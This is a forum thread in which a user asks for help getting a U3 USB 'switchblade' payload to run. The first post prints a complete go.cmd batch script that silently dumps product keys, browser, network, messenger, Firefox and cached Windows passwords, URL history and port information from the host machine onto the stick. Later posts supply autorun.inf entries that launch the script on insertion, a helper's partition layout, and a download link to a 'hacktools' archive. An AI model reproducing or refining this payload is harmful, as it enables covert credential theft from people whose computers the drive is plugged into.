Jump to content

Saving the .txt logs?


ickleangel
 Share

Recommended Posts

Hey guys and girls,

i have succesfully installed my custom package onto my U3 drive, but when it runs i get this error,

Error 5: Access is denied.

is this because of the way the go.cmd is set up?

WIPdump%computername%%computername%.log+WIPdump%computername%%computername%_pk.log* WIPdump%computername%%computername%.log  >> nul

   del /f /q [b]"WIPdump%computername%%computername%_pk.log"[/b] >nul

or am i totally missing something?

i installed my custom payload from the .iso created using the 'Universal_Customizer' suite,

please guys, really need some help with this one, just doesn't want to be nice,

i was thinking maybe its due to the way it tries to write the data to the CDROM part of the U3 drive?

how would i change this in the go.cmd or do i need to do something completely different?

here is the complete entry from my go.cmd in the /WIP/CMD folder in the .iso

@echo off

if not exist WIPdump md WIPdump >nul

if not exist WIPdump%computername% md WIPdump%computername% >nul

cd WIPCMD >nul

.nircmd.exe execmd CALL WIPCMDWIRELESS.BAT

.nircmd.exe execmd CALL WIPCMDDIR.BAT



Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

Echo ***********[System info]************ >> WIPdump%computername%%computername%.log 2>&1

Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

Echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> WIPdump%computername%%computername%.log 2>&1

ipconfig /all >> WIPdump%computername%%computername%.log 2>&1



Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

echo ***********[Dump Product Keys]****** >> WIPdump%computername%%computername%.log 2>&1

Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

   .produkey /nosavereg /stext "WIPdump%computername%%computername%_pk.log" /remote %computername% >> WIPdump%computername%%computername%.log 2>&1

   copy WIPdump%computername%%computername%.log+WIPdump%computername%%computername%_pk.log* WIPdump%computername%%computername%.log  >> nul

   del /f /q "WIPdump%computername%%computername%_pk.log" >nul

Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

echo ***********[Dump IE7 secrets]******* >> WIPdump%computername%%computername%.log 2>&1

Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

   .iepv.exe /stext "WIPdump%computername%%computername%_ie7.log" >> WIPdump%computername%%computername%.log 2>&1

   copy WIPdump%computername%%computername%.log+WIPdump%computername%%computername%_ie7.log* WIPdump%computername%%computername%.log  >> nul

   del /f /q "WIPdump%computername%%computername%_ie7.log" >nul



Echo ************************************ >> WIPdump%computername%%computername%-updateslist.log 2>&1

echo ***********[Dump updates-list]******* >> WIPdump%computername%%computername%-updateslist.log 2>&1

Echo ************************************ >> WIPdump%computername%%computername%-updateslist.log 2>&1

   .wul.exe /stext "WIPdump%computername%%computername%_LSA.log" >> WIPdump%computername%%computername%-updateslist.log 2>&1

   copy WIPdump%computername%%computername%.log+WIPdump%computername%%computername%_lsa.log* WIPdump%computername%%computername%-updateslist.log  >> nul

   del /f /q "WIPdump%computername%%computername%_lsa.log" >nul



Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

echo ***********[Dump Network PW]******** >> WIPdump%computername%%computername%.log 2>&1

Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

   .netpass.exe /stext "WIPdump%computername%%computername%_np.log" >> WIPdump%computername%%computername%.log 2>&1

   copy WIPdump%computername%%computername%.log+WIPdump%computername%%computername%_np.log* WIPdump%computername%%computername%.log  >> nul

   del /f /q "WIPdump%computername%%computername%_np.log" >nul



Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

echo ************[Dump Cache PW]********* >> WIPdump%computername%%computername%.log 2>&1

Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

.cachedump.exe >> WIPdump%computername%%computername%.log 2>&1



Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

echo ***********[Network Services]******* >> WIPdump%computername%%computername%.log 2>&1

Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

netstat.exe -abn >> WIPdump%computername%%computername%.log 2>&1



Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

echo ***********[Dump messenger PW]******** >> WIPdump%computername%%computername%.log 2>&1

Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

   .mspass.exe /stext "WIPdump%computername%%computername%_ms.log" >> WIPdump%computername%%computername%.log 2>&1

   copy WIPdump%computername%%computername%.log+WIPdump%computername%%computername%_ms.log* WIPdump%computername%%computername%.log  >> nul

   del /f /q "WIPdump%computername%%computername%_ms.log" >nul



Echo ************************************ >> WIPdump%computername%%computername%-ie.log 2>&1

echo ***********[Dump URL History]******* >> WIPdump%computername%%computername%-ie.log 2>&1

Echo ************************************ >> WIPdump%computername%%computername%-ie.log 2>&1

   .iehv.exe /stext "WIPdump%computername%%computername%_ie.log" >> WIPdump%computername%%computername%-ie.log 2>&1



set RtD=%CD%

cd /D "%appdata%MozillaFirefoxProfiles" >nul

set PROFILE=

for /D %%i in (*) do set PROFILE=%%i

cd /D %RtD% >nul

Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

Echo *********[Dump Firefox PW]********** >> WIPdump%computername%%computername%.log 2>&1

Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

.FirePassword.exe "%appdata%MozillaFirefoxProfiles%PROFILE%" >> WIPdump%computername%%computername%.log



cd WIPdump%computername% >nul

Echo ************************************ > WIPdump%computername%%computername%port.log 2>&1

echo ************[Port Scan]************* >> WIPdump%computername%%computername%port.log 2>&1

Echo ************************************ >> WIPdump%computername%%computername%port.log 2>&1

cd 

WIPCMDportqry -local -l WIPdump%computername%%computername%_ports.log>>nul

copy WIPdump%computername%%computername%.log+WIPdump%computername%%computername%_ports.log >>nul

del /f /q "WIPdump%computername%%computername%_ports.log" >nul

cd WIPCMD >nul

here is an upload of my original NON-U3 switchblade,

http://rapidshare.com/files/13264612/ike-hacktools.rar

the above is exactly what i put in my .iso and used ISOCreate.cmd with all the tools, from WIPCMD

All help greatly appreciated,

Thanks,

ike,

Link to comment
Share on other sites

It just means one of the tools can't run, or it has no access to write the logs. Check if ur running the payload from an administrator account, and also make sure that ur USB key isn't set to read-only.

its definately an admin account, cos its my own one lol

how do i check if the USB is set to read only?

thanks,

ike,

Link to comment
Share on other sites

The programs/logs/files/you get the point will go on the FLASH partition of the drive. The only thing on the CD partition is the autorun.inf and other files U3 needs to run

i thought it was that, but i was too tired to try it,

so it should go like this:

[CDFS]

Autorun.inf

U3 Launcher.exe (from original U3 file?)

[FLASH]

/WIP/CMD

/WIP/DUMP

etc?

My current Autorun.inf -

[autorun] 

action=Open Files On Folder

icon=iconsike.ico

shellexecute=nircmd.exe execmd CALL WIPCMDgo.cmd

does this need to be modified to point to anywhere on the flash partition, or is it fine as it is?

sorry for the noob questions, i just wanna make sure i dont destroy my drive,

Thanks for your help so far,

ike,

Link to comment
Share on other sites

ok, so im super confused now,

any chance you could write me up a complete idiot sheet? as i thought i needed to install a autorun.inf to the CDFS partition to point to the flash partition and the files to run them, or am i mistaken?

sorry for taking up so much of your time on this, i really appreciate it, just want to get it working on my U3 drive as that works better so i have been led to believe,

thanks again,

ike,

Link to comment
Share on other sites

Ok... heres the cheat sheet

On your cd partition:

*** All of these are already on the CD partition, or should be ***

autorun.inf

Launchpad.zip

LaunchU3.exe

*** All of these are already on the FLASH partition, or should be ***

/Documents

/System

LaunchU3.exe

**** /What ever else you want goes on the flash partition UNLESS you used the ISO****

Hope this helps

--ShadowHax

Link to comment
Share on other sites

  • 2 weeks later...

Hi, sorry not replied, been painting my laptop...

if i understand correctly,

the autorun.inf on the CD is the original one,

the autorun.inf in the flash is the modified one pointing to go.cmd

so in the CD i now have,

original U3 stuff,

Documents Folder,

Launchpad Folder,

LaunchU3.exe

Autorun.inf

the contents of the autorun on the CD partition

[AutoRun] 

open=LaunchU3.exe

icon=LaunchU3.exe,0 



[Definitions]

Launchpad=LaunchPad.exe



[CopyFiles]

FileNumber=1

File1=LaunchPad.zip

on the flash i now have,

Documents Folder (original u3)

Launchpad Folder (original u3)

launchu3.exe

launchpad.zip

i have also added these for my switchblade,

WIP Folder containing 'tools' (wipcmdgo.cmd)

Icons (containing custom icons)

nircmd.exe (needed to run wipcmdgo.cmd????)

and my Custom Autorun.inf

the contents of the autorun.inf on my flash

[autorun] 

action=Open Files On Folder

icon=iconsdrive.ico

shellexecute=nircmd.exe execmd CALL WIPCMDgo.cmd

sorry to keep pestering you about this,

thanks for all your help so far,

ike,

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...